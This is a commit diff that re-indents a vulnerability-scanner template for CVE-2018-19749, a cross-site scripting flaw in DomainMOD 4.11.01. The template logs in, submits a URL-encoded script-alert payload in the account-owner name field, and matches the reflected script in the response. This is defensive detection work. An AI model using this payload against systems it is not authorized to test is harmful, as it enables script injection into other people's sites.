Update CVE-2018-19749.yaml

2022-07-14 15:33:59 +05:30 · 2022-07-14 15:33:59 +05:30 · 519767dc9c
parent e2083a001c
commit 519767dc9c
1 changed files with 41 additions and 41 deletions
--- a/cves/2018/CVE-2018-19749.yaml
+++ b/cves/2018/CVE-2018-19749.yaml
@ -1,53 +1,53 @@
 id: CVE-2018-19749
 info:
-  name: DomainMOD 4.11.01 - Cross-Site Scripting
+   name: DomainMOD 4.11.01 - Cross-Site Scripting
-  author: arafatansari
+   author: arafatansari
-  severity: medium
+   severity: medium
-  description: |
+   description: |
-    DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via assets/add/account-owner.php Owner name field.
+     DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via assets/add/account-owner.php Owner name field.
-  reference:
+   reference:
-    - https://www.exploit-db.com/exploits/45941/
+     - https://www.exploit-db.com/exploits/45941/
-    - https://nvd.nist.gov/vuln/detail/CVE-2018-19749
+     - https://nvd.nist.gov/vuln/detail/CVE-2018-19749
-  metadata:
+   metadata:
-    verified: true
+     verified: true
-  tags: cve,cve2018,domainmod,xss,authenticated
+   tags: cve,cve2018,domainmod,xss,authenticated
 requests:
-  - raw:
+   - raw:
-      - |
+       - |
-        POST / HTTP/1.1
+         POST / HTTP/1.1
-        Host: {{Hostname}}
+         Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded
+         Content-Type: application/x-www-form-urlencoded
-        new_username={{username}}&new_password={{password}}
+         new_username={{username}}&new_password={{password}}
-      - |
+       - |
-        POST /assets/add/account-owner.php HTTP/1.1
+         POST /assets/add/account-owner.php HTTP/1.1
-        Host: {{Hostname}}
+         Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded
+         Content-Type: application/x-www-form-urlencoded
-        new_owner=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_notes=
+         new_owner=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_notes=
-      - |
+       - |
-        GET /assets/account-owners.php HTTP/1.1
+         GET /assets/account-owners.php HTTP/1.1
-        Host: {{Hostname}}
+         Host: {{Hostname}}
-    cookie-reuse: true
+     cookie-reuse: true
-    redirects: true
+     redirects: true
-    max-redirects: 2
+     max-redirects: 2
-    matchers-condition: and
+     matchers-condition: and
-    matchers:
+     matchers:
-      - type: word
+       - type: word
-        part: body
+         part: body
-        words:
+         words:
-          - '"><script>alert(document.domain)</script></a>'
+           - '"><script>alert(document.domain)</script></a>'
-      - type: word
+       - type: word
-        part: header
+         part: header
-        words:
+         words:
-          - text/html
+           - text/html
-      - type: status
+       - type: status
-        status:
+         status:
-          - 200
+           - 200